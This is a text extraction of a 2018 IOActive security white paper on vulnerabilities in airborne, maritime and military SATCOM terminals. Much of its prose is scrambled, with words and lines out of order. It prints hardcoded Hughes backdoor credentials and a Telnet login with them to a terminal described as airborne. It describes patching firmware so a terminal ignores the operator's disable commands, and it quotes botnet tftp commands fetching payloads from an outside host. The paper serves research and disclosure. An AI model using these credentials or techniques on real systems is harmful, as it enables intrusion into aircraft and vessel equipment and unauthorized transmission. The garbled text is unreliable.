Last Call for SATCOM Security

Transcript

1 Research-fueled Security Services \ WHITE PAPER \ Last Call for SATCOM Security Ruben Santamarta August 2018

2 Contents ... 1 Introduction 1 ... Impact ... 3 Aviation ... 4 A Global Exposure Breaking into the MODMAN 16 ... ... Post -Exploitation 19 Firmware Functionalities ... 22 Authentication ... 22 Malware Targeting Airplanes through Exposed Telnet Service ... 24 ... Accelerators 26 ... 29 Automatic Beam Switching (ABS) Network Operations Center (NOC) ... 33 Network Services ... 37 Web 37 ... Telnet ... 38 FTP ... 39 Install Co nsole ... 39 40 ... Info Server Host Command Server ... 43 ... Maritime 45 ... The Intellian Case 45 Vulnerable CGIs ... 48 Malware Onboard ... 49 Controlling the Antenna 50 ... Military ... 54 Cyber-Physical Attacks ... 55 Beyond Logic Attacks, Going Physical ... 55 High Intensity Radiation Fields in the Aviation Industry 57 ... Analysis of Radiation Hazards ... 61 ... Antenna Models 63 – Maritime Intellian GX60 63 ... Cargo Vessel ... 64 Cruise ships ... 65 Kustream 1500 ... 66 - Aviation Ground ... 67 In-Flight ... 68 Responsible Disclosure ... 69 ... 70 Conclusion , Inc. ©2018 IOActive

3 Introduction -world This research comprehensively details three real scenarios involving serious vulnerabilities that affect the aviation, maritime , and military industries. The vulnerabilities include backdoors, insecure protocols, and network misconfigurations. This white paper ese vulnerabilities , which could allow elaborates the approach and technical details of th remote attackers, originated from the Internet, to take control of: Airborne SATCOM equipment on in -flight commercial aircraft • s • Earth Stations on Vessels, including Antennas • Earth Stations used by the US Military in conflict zones Hundreds of commercial airplanes from airlines such as Sou thwest, Norwegian , and to be still possible to find Today, it is Icelandair were found affected by these issues. vessels that are exposed to the Internet, leaving them vulnerable to malicious attacks. we are providing the evidences to demonstrate tha t Internet of Things ( IoT ) malware Also, was found actively trying to exploit exposed aircraft , as well as vessels that were already infected. A numerical analysis of the potential Radio -Frequency (RF) hazards derived from vulnerable SATCOM devices is also provi ded. These results will be compared with the High Intensity Radia ted Fields (HIRF) regulations used in the aviation and maritime s on satellites and safety -physical attacks with impact industry, demonstrating cyber implications for vessels and ships. y, the responsible disclosure process that occurred in such a sensitive and complex Finall scenario will be covered in detail. Impact three in-scope The following table identifies the risks that have been identified for the industries. Industry Security Attack Flight Likelihood RF Risk Safety Risk Vector Risk Aviation Yes No* No* Medium Remote Maritime N/A Yes Yes High Remote Military Yes N/A No Medium Remote *Based on input received from the Aviation industry through the A -ISAC and our own research ©2018 IOActive, Inc. [ 1]

4 A security risk reflects scenarios that allow the attacker to intercept, manipulate, or disrupt non- safety communications or move further into other networks. For instance, when a remote attacker is able to launch attacks against passengers’ to the devices connected in-flight WiFi by compromising SATCOM equipment. We identify a safety risk when, as a direct consequence of a successful attack, there is a potential source of harm or adverse health effect on a person or persons. This research did not carry the ex ploitation of the security risks through to producing any safety impacts, since they could not be tested in a responsible, ethical manner. This concept may be transposed differently across industries. For the military sector , a safety risk may be consider ed when adversarial forces are able to more easily pinpoint the location of military units. On the other hand, the maritime and/or aviation industries -generated HIRF s, which may can identify hazards because of the effects of SATCOM provoke malfunctions in critical navigation systems or even health damages to persons exposed to this kind of non -ionizing RF. Industry Threat • Ability to disrupt, intercept or modify non -safety communications such as In - Aviation Flight WiFi * passenger’s devices Ability to attack crew and • • manipulate SATCOM antenna positioning and transmissions. Ability to • Ability to disrupt, intercept or modify onboard satellite communications Maritime • Ability to attack crew’s devices • Ability to control SATCOM antenna positioning and transmissions • Ability to perform cyber -physical attacks using HIRF • Ability to pinpoint the location of military units Military • Ability to disrupt, intercept or modify satellite communications • Ability to perform cyber -physical attacks using HIRF satellite transponders Ability to disrupt • Space (*)Typically pilot and co -pilot do not use it . In -Flight WiFi is normally used by flight attendants for PAX and PCI transactions. (*) Configurations may vary the impact. 2] ©2018 IOActive, Inc. [

5 Aviation In November 2017, during a Norwegian flight from Madrid to Copenhagen, I decided to take a look at the In -Flight Entertainment System. Norwegian is well known for offering free WiFi access in most of its airplanes. Wireshark, a common network- monitoring tool was used to capture traffic originating at the In -Flight WiFi. After leaving it running for some time I noticed two unexpected behaviors: • The IPs assigned to passenger’s devices looked like routable IPs. NetRange: 128.65.0.0 - 128.65.255.255 CIDR: 128.65.0.0/16 NetName: RIPE -ERX- 128- 65- 0-0 - 128.65.95.255 inetnum: 128.65.80.0 netname: ROW44 descr: Hughes Network Systems GmbH country: DE • It was possible to observe network scans, coming from external random hosts, directed to internal but routable IPs. This raised a red flag , so I spent the flight mapping the internal network, passively collecting evidence and performing an initial analysis of the network traffic that was captured. Once the flight landed, a simple network scan against those ranges revealed that multiple common services such as Telnet, WWW , and FTP were available for certain IPs. Also , a web interface could be accessed even without authentication, as the following picture s. show 3] ©2018 IOActive, Inc. [

6 At this point there was enough evidence to assume something was really wrong , but there was little information about the systems being accessed. The initial assumption was that these HX200 devices were the airborne SATCOM modems that somehow ended up being exposed to the Internet ; however , considering the situation , it was mandatory to get a clear picture of the whole system before moving forward. Fortunately, it was possible to collect a significant amount of information about these devices from diffe rent sources videos, manuals, FCC licensing requests, etc. such as press releases, YouTube The following description of the system is entirely based on information publicly accessible. A Global Exposure in-flight connectivity through SATCOM is Providing an important technological achievement, and obviously all the companies involved will proudly show off their success. This partially explains the amount of information it was possible to acquire from public sources. A nother factor is the required regulatio ns that vendors in this industry need to comply with, which ends up generating a significant amount of documentation. As a result, it was straightforward to discover the company that was behind the Norwegian SATCOM deployment. 4] ©2018 IOActive, Inc. [

7 The initial analysis of the gathered information also revealed other prominent airlines , such as Southwest or Icelandair, having their fleets equipped with these systems. It was possible to verify that Southwest and Icelandair fleets were also exposed, although . The following screenshot, which seems part tion about we have no confirma other airlines 1 of the GlobalEagle’s NMS Software , provides some additional clues on the scale of this exposure. 1 https://www.sec.gov/Archives/edgar/data/1512077/000119312517008091/d284520dex991.htm 5] ©2018 IOActive, Inc. [

8 Media outlets actively covered these engineering efforts to provide Internet connectivity at 30,000 ft. From a technical perspective, it was certainly surprising to discover the details some of these stories provid ed. The New York Times published a nice infographic detailing the general architecture and devices. 6] ©2018 IOActive, Inc. [

9 2 Figure 1. Basic architecture of a Row44 deployment (New York Times) 3 IDG, also published a three- page story detailing how the WiFi connectivity in Norwegian had been implemented. Figure 2. Detailed Row44 architecture (IDG) 4 On YouTube , there is a time -lapse video showing the deployment of this equipment on a 5 Southwest airplane. Also , there are other videos covering test flights of Row44’s Albatross, where some photograms show the different devices that are in the scope of this research. 2 https://archive.nytimes.com/www.nytimes.com/interactive/2012/07/05/business/surfing -at-560 -mph.html 3 https://techworld.idg.se/2.2524/1.644569/wifi -flygplan/sida/1/sida - 4 https://www.youtube.com/watch?v=eFvwtfxPwac 5 https://youtu.be/XzLU8LR9_jY?t=83 7] ©2018 IOActive, Inc. [

10 ©2018 IOActive, Inc. [ 8]

11 6 we introduced common SATCOM infrastructure s, according to In our previous paper 7 which the following picture provides a clear representation of the GEE architecture : Figure 3. GEE's SATCOM assets The Ku -band Aircraft Earth Station (AES) used by Row 44 (now part of GlobalEagle) provides two -way broadband communication services to passengers and flight crews, -time access to the Internet. The AES operate in conjunction with a allowing in -flight, real that is licensed to Hughes Very Small Aperture Terminal (VSAT) network hub station Network Systems (HNS). This service between multiple aircraft terminals and the Internet is provided via multiple satellite gateways under the control of a Network Operations Center (NOC). Satellite S based on the existing Hughes HX, as well as HT gateways are procured from HN architecture. A key element of the HNS satellite system is a VSAT HX/HT broadband 6 https://ioactive.com/pdfs/IOActive_SATCOM_Security_WhitePaper.pdf 7 https://www.sec.gov/Archives/edgar/data/1512077/000119312517008091/d284520dex991.htm 9] ©2018 IOActive, Inc. [

12 terminal that provides Internet Protocol (IP) connectivity via geostationary satellites, offer airborne users broadband IP data service. augmented with a mobility feature to The system supports reception and transmission in the 11.70 GHz to 12.20 GHz and 14.05 GHz to 14.47 GHz band respectively, utilizing independent linearly polarized array om a geostationary satellite in space. antennas for communication to and fr This deployment complies with the ARINC 791 standard, which defines Ku and Ka band satellite data airborne terminal equipment. This standard allows a certain degree of flexibility in terms of the functionalities impl emented, but we can provide a generic description of the components as follows: 1. MODMAN – Modem Manager The MODMAN hosts the modem, which modulates and demodulates signals to and from baseband but also implements core functionalities such as interfacing with the KANDU and KRFU or receiving external signals from other aircraft sensors or units. KANDU – Ku/Ka Band Data Unit 2. It provides power to the satellite antenna and uses external inputs, such as aircraft dition to implement the positioning navigational data, to control its movement. In ad algorithms it also interfaces with the KRFU. – Ku/Ka Band Radio Frequency Unit 3. KRFU The KRFU converts modem IF to Ku - or Ka -band frequencies from the modem to prepare for transmission to the satellite. It also works as a high -power amplifier for transmitting the signal. The KRFU governs this process in reverse as well, converting the Ku - or Ka- band transmissions received from the satellite back to the IF. 4. OAE – Outside Antenna Equipment This is the antenna unit that m ay be located in different positions, such as Tail Mounted Antennas (TMA) or Fuselage Mounted Antennas (FMA). 10 ©2018 IOActive, Inc. [ ]

13 As such, is comprised of the following elements: GEE’s ARINC 791 equipment Device Vendor Function ARINC 791 Model Modem Kontron MODMAN Modem, built on top of a MDU Hughes HX200 SATCOM modem KANDU KuStream 1000 ACU TECOM Antenna Control Unit KANDU Server Kontron Server Management Unit. It SMU is an airborne server that hosts the IFE Portal and other core services. OAE KuStream 1000 SAA TECOM Phased Array Antenna KuStream 1000 High Power Transceiver KRFU TECOM HPT MDU Modem Data Unit – ACU – Antenna Control Unit – SMU Server Management Unit SAA – Satellite Antenna Assembly HPT – High Power Transceiver In order to operate a network for in flight connectivity, the service provider must work with all relevant aviation authorities ( i.e. EASA, FAA) to secure the necessary Supplemental 8 Type Certificates (STCs). Most of these documents are publicly accessible , thus providing valu able information to understand the capabilities and requirements for these systems. At this point we are in a position to summarize how the GEE ARINC 791 deployment is working, which would also allow us to properly elaborate the attack scenarios. The SMU ( on the left) serves as the system controller, providing core functionalities to both the KANDU, KRFU and MODMAN (on the right) but also to passengers and crew as it is exposing the IFE Portal. 8 general/search -fcc- databases https://www.fcc.gov/licensing -databases/ ] 11 ©2018 IOActive, Inc. [

14 The SMU also provides the switching of data from various peripherals locate d in the aircraft cabin and utilizes an aircraft digital computer interface to receive aircraft position, state of flight, etc. The SMU also receives aircraft level discrete inputs to detect various els signal. conditions, including the Weight -on- Whe , the SMU is capable of establishing 3G data links only on the ground. This Additionally cellular antenna is located inside the radome, as shown below. ©2018 IOActive, Inc. [ 12 ]

15 9 Figure 4. Cellular antenna in radome The ACU and the HPT have be en discovered directly interfacing via discrete inputs, but also through ethernet in the same network segment where the MDU and SMU have access to. 10 Figure 5. Interfaces 9 Southwest WiFi Installation https://www.youtube.com/watch?v=eFvwtfxPwac 10 -WebKustreamBrochureOct2014.pdf -ind.com/files/547dfa557058d http://www.tecom ] 13 ©2018 IOActive, Inc. [

16 11 Figure 6. Interfaces As a result, once the MDU is compromised, it is possible to reach both the ACU and HPT. in-flight WiFi; although this does not intrinsically The SMU remains accessible from the mean it can be easily compromised. If that situation ever happens the attacker will be in a . position to gain control over the entire ARINC 791 deployment aboard the target aircraft 11 http://www.kustream.com/gallery.php ©2018 IOActive, Inc. [ 14 ]

17 According to the documentation collected except for the MDU and the CWLU, the remaining devices run Linux. Cabin Wireless LAN Units (CWLU) are provided to allow users with 802.11g/n enabled devices to gain access to the airborne connectivity. Regarding the CWLU Josep Pi, Senior Security Consultant at IOActive, will be presenting at DefCon’18 his research on Access Points use: ExtremeNetworks’ breaking the Operating Systems these, and other 12 WingOS . 12 -26-schedule.html -26/dc https://www.defcon.org/html/defcon 15 ©2018 IOActive, Inc. [ ]

18 13 Figure 7. GEE devices Flight crew also has specific elements both at the cabin and cockpit to control the system. Breaking into the MODMAN At this point it is worth summing up the steps that have been followed so far: 1. In-Flight network traffic capture 2. In-Flight network mapping 3. Hughes/GlobalEagle (GEE) n etwork scanning 4. Initial information gathering 13 -2 -flygplan/sida/2/sida https://techworld.idg.se/2.2524/1.644569/wifi ©2018 IOActive, Inc. [ 16 ]

19 Having a decent amount of information about GEE ’s system internals, and its corresponding SATCOM Hughes infrastructure, it was time to get back to the analysis of the exposed systems identified during the Stage 3. GEE’s MODMAN is a Kontron device built on top of a Hughes HX200 SATCOM modem. revious SATCOM research in 2014, we identified multiple vulnerabilities in During the p Hughes SATCOM terminals, including backdoors. When a company has been found embedding backdoors in its products, it is not usually a developer’s mistake but actually a n. In this case by reading the official HX200 documentation an interesting design patter 14 feature was noticed: “The Fallback Updater” Software that is able to install new firmware to the unit without asking for a password is definitely a good candidate to host a backdoor. Using a simple google search it is possible to download the fallback updater software from the website of a satellite 15 provider. This program contains both the recovery firmware ‘ fallback.bin’ and the Windows program e device. By reverse engineering this binary we can ‘ HUGHES_updater.exe ’ to update th know more about how the updating mechanism has been implemented. 14 http://dbstv.com/wp -content/uploads/2014/07/HX200_Installation_Procedure_Rev_A -04_060413.pdf 15 http://support.iwayafrica.com/index.php?_m=downloads&_a=viewdownload&downloaditemid=37 17 ©2018 IOActive, Inc. [ ]

20 1. The following code is pretty explanatory; it is basically the interface we have seen in the previous page. The program requires us to provi de the Unit’s IP and then Fallback updater will connect to the port 23 (Telnet) . 2. Once connected it looks for the following login prompt “VxWorks Login:” which corresponds to the default VxWorks’s shell service. then waits for the password prompt from the 3. It sends the username ‘ brighton ’ and server. 18 ©2018 IOActive, Inc. [ ]

21 4. Finally, it sends the backdoor password ‘ swordfish ’ and waits for the shell’s prompt ‘ ->’. Obviously, the next step was to try this backdoor against the GEE’s MODMAN to see if -flight aircraft, via the Internet we could really get a sh ell on an in Trying 128.65.92.65... Connected to 128.65.92.65. Escape character is '^]'. VxWorks login: brighton Password: -> We were in. One of the most disappointing aspects of this discovery is that these hardcoded credentials have been present and well known in certain Hughes devices since at least 18 16 , 17 , the mid 2000’s. 16 -HN7000S http://www.dslreports.com/forum/r22972398 -HN7000s -serial 17 http://www.dslreports.com/forum/r18345515 -telnet -login 18 to-use -static -IP -How- http://www.dslreports.com/forum/r 21504271 -HN7000S 19 ©2018 IOActive, Inc. [ ]

22 Post -Exploitation It was also possible to access the FTP server using the same credentials. By accessing the filesystem we could download the actual firmware (‘/cfg0/main.bin’) running in the MODMAN in addition to logs or configuration files. So, we already have access to the f irmware , web interface, VxWorks Shell , FTP server , and d ocumentation . These elements allow us to understand the system and its capabilities in detail. Although, we cannot forget that we were accessing an in -flight aircraft so the idea is to gain as much knowledge as possible while performing innocuous, and ideally passive, actions only. In order to comply with this approach, it i s crucial to reverse engineer the firmware and map all those functionalities that are described in the collected documents, into the assembly that is being analyzed. However, as we have nctionalities. previously seen, we also need to stay vigilant to spot undocumented fu , this is basically a static analysis approach; although we are leveraging the As a result access to a live system in order to gather some information that can be useful to add some context. There are two main goals for the post -exploitation phase, we want to: Turn the GEE’s ARINC 791 equipment (MDU, HPT and ACU) into a malicious • intentional radiator. This involves controlling the power of the transmission, how and when the signal is transmitted and the antenna pointing mechanism. Eavesdrop • and tamper with crew and passenger’s communications. terminals are usually quite complex in terms of functionalities. Despite this we Satellite are oversimplifying here to introduce an underlying issue: Satellite terminals are ‘dumb’ devices. ©2018 IOActive, Inc. [ 20 ]

23 This does not mean they are not capable of doing complex actions, but they require ‘someone’ to tell them when, and usually how, to perform those operations. In this sense, they are similar to an ATM, which is totally capable of performing complex tasks, such as dispending cash, but it must be instructed from the Host on how to do so. We have to take into account that most of the time the SATCOM modem depends on the Network Operations Center (NOC) to comply with the satellite network’s requirements. r how potential attackers can leverage this design. We will see late There are three key documents that can be used as a reference to understand the system as whole as well as the devices we have previously described: 19 • “HX System Overview” It provides a comprehensive an alysis of the Hughes HX system . If you are interested in following this whitepaper from a technical , this document perspective is a highly recommend ed read ing . • “Apparatus and Method for Efficient TDMA Bandwidth Allocation for TCP/IP 20 -Based Networks” Satellite This patent from Hughes contains really valuable information about the internal protocols used between the NOC and the Earth Stations. It can be used to reconstruct and understand proprietary packet structures in the firmware. “Row 44, Inc. Appl ication for Authority to Operate Up to 1,000 Technically Identical • Aeronautical Mobile Satellite Service Transmit/Receive Earth Stations Aboard 21 Commercial and Private Aircraft” This is the FCC’s approval letter for Row44 that authorizes them to operate t he ARINC 791 system we are analyzing. It contains valuable information about its internal logic and functionalities. The version of the HX200 firmware in scope is ‘6.9.0.51’ . Main.bin: 6e64d4821c71d1312ff42d8dc8d2c86795852ed1 Inside ‘main.bin’ we can find a MIPS VxWorks image which embeds the Hughes Crypto 22 Kernel (libchk.elf) for terminals operating in FIPS 140 -2 mode. This library is also used, at runtime, to verify the digital signature of main.bin. This security scheme can be bypassed. 19 https://usermanual.wiki/Hughes/HxSystemoverview.867933836/view 20 https://www.goo gle.com/patents/US6834039 21 https://apps.fcc.gov/edocs_public/attachmatch/DA -09- 1752A1.pdf 22 -Validation -Program/Certificate/919 https://csrc.nist.gov/Projects/Cryptographic -Module ] 21 ©2018 IOActive, Inc. [

24 The VxWorks imag , so it was e has been compiled with the full Symbol Table intact possible to reconstruct symbols using a simple IDA script that can be found at the 23 IOActive public repository. Firmware Functionalities -performance satellite router desig The HX200 is a high -grade IP ned to provide carrier services using dynamically assigned high -bandwidth satellite IP connectivity. The firmware is quite complex due to the number of functionalities that have been implemented, such as: • Software and configuration updates via dow nload from the HX Gateway • Implements dynamic, self -tuning Performance Enhancement 24 • Performance Enhancing Proxy (PEP) software to accelerate the throughput performance by optimizing the TCP transmission over the satellite, delivering superior user experience and link efficiency Configuration, status monitoring, and commissioning via the NOC • • Embedded Web interface f or local status, control and troubleshooting • Remote terminal management via the Hughes Unified Element • Manager and SNMP agent • Dynamic outbound coding and modulation changes based on received signal Dynamic inbound coding changes based on received signal • • Dynamic remote uplink power control The following areas illustrate some of the functionalities that will fit into our attack scenario. Authentication As we could expect, the ‘brighton/swordfish’ backdoor is present. Please note that the password is in VxWorks’ hashed form. 23 https://github.com/IOActive/ 24 -pep- 05.txt -D/pilc https://www.ietf.org/proceedings/50/I ©2018 IOActive, Inc. [ 22 ]

25 In addition to these credentials we can find another pair: ‘ crypto/officer’ . These are apparently used for the Crypto -140 -2 mode, -officer role that terminals, operating in FIPS need to support. These credentials are initialized by ‘ cfm_ get_support_parms’ web Then added to the embedded web server configuration to restrict access to certain pages to the CryptoOfficer role only. 23 ©2018 IOActive, Inc. [ ]

26 As we can see in the paths, there are some specific functions reserved for this role . Definitely, we could use these backdoors to gain access to the MDU through FTP, Telnet or the embedded Web UI, in those places where it requires authentication. through Exposed Telnet Malware Targeting SATCOM Terminals Service In this case, before proceeding with the static analysis approach we leveraged the access to a live system to obtain a clear picture of the network activity. We can use both the shell web UI i and the Web UI to obtain this information, as in some cases the s merely a wrapper for VxWorks’ shell commands. We previously described that the device was exposing, among other services, the VxWorks default shell. In the following picture, that shows the active network connections, there is an interesting pattern: ©2018 IOActive, Inc. [ 24 ]

27 There are a couple of public IPs trying to connect to the Telnet service, so the highlighted IP (181.27.184.18) was further investigated to understand whether these connections were targeted or not. Nmap scan report for 181 84.18) -27- 184- 18.speedy.com.ar (181.27.1 Host is up (0.45s latency). Not shown: 990 closed ports PORT STATE SERVICE 22/tcp open ssh 23/tcp filtered telnet 53/tcp filtered domain 80/tcp open http 554/tcp filtered rtsp 555/tcp filtered dsf 1025/tcp filtered NFS- or- IIS 1026/tcp filtered LSA -or- nterm 4224/tcp filtered xtell 8093/tcp filtered unkno The offender host appeared to be a compromised router from Argentina. By examining it is easy to notice that something is wrong in the router: the running processes, 25 ©2018 IOActive, Inc. [ ]

28 ~ $ ps PID Uid VSZ Stat Command 1 root 1212 SW init ... 577 root 1508 SW /usr/bin/ip6aac 587 root 1212 SW -sh 619 root 1500 DW /usr/bin/adslstart 2 1 620 root 1500 DW /usr/bin/adslstart 2 1 695 root 764 SW /sbin/2684d 1509 root SW< [kTPTd] 1517 root 224 SW iwcontrol wlan0 1946 root 292 SW l2bwl4bw57bw3f3opmps 1947 root 268 SW l2bwl4bw57bw3f3opmps 1949 root 384 SW l2bwl4bw57bw3f3opmps 2401 root 428 SW l2bwl4bw57bw3f3opmps -stub 2741 root 836 SW /usr/bin/3g 2746 root 1268 SW 3g -mngr diald 2775 root 1284 SW 3g -mngr diald 2895 root 1212 SW sh -c cd /tmp || cd /var/run || cd /mnt || cd /root | 2903 root 1212 SW sh tftp2.sh -c cd /tmp || cd /var/run || cd /mnt || cd 2913 root 1212 SW sh /root | 2921 root 1208 SW sh tftp2.sh g 104.153.108.77 -r ntpd - 2923 root 1220 SW tftp 2945 root 252 SW g 104.153.108.77 -r sshd - 2946 root 1220 SW tftp 2947 root 1404 SW /usr/sbin/dropbear 2962 root 1212 SW -sh Further analysis revealed this router was part of the Gafgyt IoT botnet, scanning for new potential targets. There is no indication that this malware family either had success or that it was specifically targeting accessing the SATCOM terminal on any aircraft airborne routers, so we should consider this situation as a ‘collateral damage’. However, the astonishing fact is tha -force attacks performing brute t this botnet was, inadvertently, -flight aircraft. against SATCOM modems located onboard an in Accelerators SATCOM devices usually implement data accelerators, either internally or by using external equipment. Hughes’ HX syst em is not an exception so its terminals support both TCP/IP and Web browsing acceleration through the PEP and TurboPage functionalities 25 respectively. The following pictures are extracted from official Hughes documents . 25 https://usermanual.wiki/Hughes/H48792Hr1.788988241.pdf ©2018 IOActive, Inc. [ 26 ]

29 We can easily identify the funct ions behind the TurboPage implementation, as the following image shows. From an offensive perspective, this would allow an attacker to intercept the websites that are being requested, also opening the door to manipulate data at will. ] ©2018 IOActive, Inc. [ 27

30 Also, there are compression algorithms involved in this functionality, such as YK, BLC, or the extended version of V44 that was created by Hughes. ©2018 IOActive, Inc. [ 28 ]

31 Performance Enhancing Proxy Companies should notice that accelerators need to be considered an attack vector for eployments. Usually the logic behind them involves intense parsing of web SATCOM d pages and/or TCP/IP packets. Automatic Beam Switching (ABS) This kind of technology allows the ACU to be directly controlled by a modem in order to from different beams. This ‘roaming’ is performed maintain connectivity while moving according to locally stored satellite footprint maps, satellite parameters and real -time positions. Although the MDU supports this mode of operation, when it is enabled through the ‘local.a’ configuration file (‘/cfg0’/local.a’), for GEE’s deployment this functionality has been disabled: absCfEnable=0 acuCfPort=0 acuCfType=0 acuCfPolType=0 acuCfIpAddress=0 However, it is interesting to briefly analyze the logic behind HX200’s ABS implementation to illustrat e how potentially, in a different scenario, it would be possible to command a modem specific ACU (different from the model that GEE is using) directly from the . 29 ©2018 IOActive, Inc. [ ]

32 First of all, the firmware checks whether ABS has been enabled, and if so then proceeds 26 to o btain the required parameters for the supported ACU , from the same configuration file, such as IP and port. Then the MDU tries to connect to the ACU 26 orbit -cs.com 30 ©2018 IOActive, Inc. [ ]

33 Once connect ed, it uses the custom ACU’s protocol to initiate the handshake. ©2018 IOActive, Inc. [ 31 ]

34 as been completed, and the When this handshake h modem has successfully established a connection to the ACU, there are different commands that can be sent to this ACU in order to mute/unmute the transmission (by controlling the Block Up Converter). Having control over whether a n antenna is transmitting or not is a key capability when considering RF attacks in SATCOM environments. ] 32 ©2018 IOActive, Inc. [

35 This situation also introduces the problem of the security posture we can find in protocols used to interface with different ACUs, also in the mariti me sector. For instance, 27 OpenAMIP does not strictly require a specific authentication or authorization mechanism. The same issue has been found in other proprietary protocol s, although details are omitted in this paper . Network Operations Center (NOC) We anticipated SATCOM terminals highly depend on the NOC to receive instructions to properly operate. In our specific case, the NOC is in charge of the following functions: • Managing satellite transponder capacity • Allocating forward and return link frequencies transmit authorization, data rate, and transmit power for each airborne terminal Monitoring of the EIRP levels to each satellite transponder and commanding • transmit power changes of selected airborne terminals as required Managing data rate change requ ests from airborne terminals. • • Managing aggregate off -axis EIRP spectral density • Managing faults of the system, including maintaining system wide keep -alive signaling for positive control of airborne terminal transmissions 27 “OpenAMIP is an IP based protocol that facilitates the exchange of information between an Antenna Controller Unit and a satellite router. ©2018 IOActive, Inc. [ 33 ]

36 Basically, once data from the ai rcraft navigation system is available, the antenna automatically points to the desired satellite and begins receiving the forward links. However, in order to avoid RF interferences to other satellites, the airborne terminal cannot start transmitting to the satellite yet, until the NOC authorizes the terminal via the forward link. Upon receipt of this authorization, the airborne terminal consults non - transmit policy information locally stored and compares this to aircraft navigation system location informati on to determine whether the aircraft is permitted to transmit. Still, there are other inputs that complete the ‘enable transmission logic’: • No faults are detected The calculated pointing direction is not inside a ‘blocked direction’ mask area • • Correct polar ization • Pointing error is sensed as less than the regulatory limit (0.2 degrees) • The Modem is locked on the desired satellite RX signal Not all these functions are controlled by the modem, so in order to turn our compromised HX200 into an intentional radia tor we also may need to take control over certain functionalities on the KRFU and KANDU. The different kind s of messages supported between the terminal and the NOC are quite . They are well described in the patents we have previously referenced. In stead complex of elaborating all of them, we basically focus on an important example to illustrate how it ©2018 IOActive, Inc. [ 34 ]

37 would be possible to prevent the NOC from remotely disabling or controlling the terminal. As a result, once a malicious firmware has been installed in the com promised MDU, it is possible to let the terminal operate independently, instead of being under NOC’s control. 28 By consulting one of the three key documents we can find the following command, that is sent via an ICAP packet (Inroute Command/Acknowledgement Packet): If the NOC detects any situation that requires the airborne terminal to be disabled, this command will be received. Let’s analyze in the firmware how it is handled: ’ function we can see the different subcommands that are In ‘ ParseICAP supported, but also , we can see others that are not publicly documented. 28 https://www.google.com/patents/US6834039 35 ©2018 IOActive, Inc. [ ]

38 For example, when receiving an ICAP where the command byte is '4h' (actually 0xC4h in the ICAP frame), which corresponds to 'Enable/Disable transmit' operation, the following s executed: code i At 0x81611515 we have the flag that other functions check to know whether the MDU is allowed to transmit or not. Using the same approach , we can track and patch any other function that handles those messages sent by the NOC to instruct our te rminal on using a specific amount of power for the transmission, Inroute Groups, Frequencies, Timing, etc. As a Bandwidth restrictions, bitrate, modulation and coding schemes, ALOHA slots, result, it is possible that a compromised SATCOM terminal operates independently, without complying with the NOC instructions. Also , we can enable the inroute without a Thus, the modem may be transmitting when it is not authorized to do so valid outroute. which basically breaks several fundamental regulatory rules for Ear th Stations Aboard 29 Aircraft (ESAA) such as § 25.227(a)(9) and § 25.227(a)(10) . 29 http://licensing.fcc.gov/myibfs/download.do?attachment_key=1091461 36 ©2018 IOActive, Inc. [ ]

39 Among other attacks, this can be leveraged by attackers to launch denial of service attacks against satellites, both from a logical and physical perspective. In case this situation is detected, airlines and satellite service providers can use a secondary communication channel, such as ACARS, in order to instruct the crew to disable the unit manually. Network Services Web Without any authentication it is possible to monitor the status of the unit, network connections, statistics, arp entries, webs being accessed by passengers, etc. Also , it is possible to perform more aggressive actions such as rebooting the terminal. ©2018 IOActive, Inc. [ 37 ]

40 Telnet Using backdoors, we can get access to the VxWorks Shell console. In terms of impact, this kind of access grants the attacker the ability to execute arbitrary code. This vector can also be leveraged to achieve persistence. -> help help Print this list ioHelp Print I/O utilities help info dbgHelp Print debugger help info nfsHelp Print nfs help info netHelp Print network help info spyHelp Print ta sk histogrammer help info timexHelp Print execution timer help info h [n] Print (or set) shell history i [task] Summary of tasks' TCBs or task ti task Complete info on TCB f sp adr,args... Spawn a task, pri=100, opt=0, stk=20000 taskSpawn name,pri,opt,stk,adr,args... Spawn a task td task Delete a task ts task Suspend a task tr task Res ume a task d [adr[,nunits[,width]]] Display memory m adr[,width] Modify memory mRegs [reg[,task]] Modify a task's registers interactively pc [task] Return task's program counter Type to continue, Q to stop: iam "user"[,"passwd"] Set user name and passwd whoami Print user name devs List devices ld [syms[,noAbort][,"name"]] Load stdin, or file, into memory (syms = add symbols to table: -1 = none, 0 = globals, 1 = all) lkup ["substr"] List symbols in system symbol table ess lkAddr address List symbol table entries near addr 38 ©2018 IOActive, Inc. [ ]

41 checkStack [task] List task stack sizes and usage printErrno value Print the name of a status value period secs,adr,args... Spawn task to call function periodically repeat n,adr,args... Spawn task to call function n times (0=forever) version Print VxWorks version info, and boot line FTP Using backdoors, it is possible to access to the filesystem. It is worth mentioning that FTP is one of the accepted methods to update the firmware. This vector c an also be leveraged to achieve persistence. 250 Changed directory to "/cfg0/" ftp> ls 227 Entering Passive Mode (128,65,86,65,4,1) 150 Opening ASCII mode data connection size date time name -------- ------ ------ -------- 4532309 Jan -01- 1980 00:00:14 fallback.bin 386543 Jan -01- 1980 00:04:58 zipdb.gz 3025 Jun- 17- 2016 19:16:26 sbc.cfg 82 Jan- 01- 1980 00:05:38 bootline.txt 2048 Aug- 24- 2016 01:48:32 config

2048 Jul- 10- 2016 00:02:02 new 2048 Nov- 25- 2017 23:46:22 logs 2975 Nov- 25- 2017 20:35:40 reset.log 25- 2017 20:48:04 time.log 8 Nov- 25- 2017 20:42:18 main.dat 18 Nov- 524288 Nov -25- 2017 20:34:30 leofs 04- 2013 16:53:52 eeprom.dat 0 Dec- 2005 Nov- 25- 2017 23:52:34 cimcfg.a 2048 Dec- 04- 2013 16:53:48 bin 2048 Nov- 25- 2017 20:38:08 snmpd 894 Jan- 25- 2016 15:43:54 txradio.dat 63 Jul- 10- 2016 00:02:02 rules.txt Install Console a user This service was listening on port 1953/TCP without authentication. It allows to configure and control the modem. ©2018 IOActive, Inc. [ 39 ]

42 Info Server This is an interesting service. It is running on port 2100/TCP generating data that is consumed by 10.7.0.10. ineering this service By reverse eng , it was possible to discover the functionality described 30 Row44 filled to get the authorization for their systems. in the request 30 https://apps.fcc.gov/edocs_public/attachmatch/DA -09- 1752A1.pdf 40 ©2018 IOActive, Inc. [ ]

43 The following function initializes the parameters ©2018 IOActive, Inc. [ 41 ]

44 ’ we can see how this s ervice obtains from the demodulator InfoSrvConHandler Then, at ‘ the ‘Es/No’ Data that is sent to the clients that are connected. ] ©2018 IOActive, Inc. [ 42

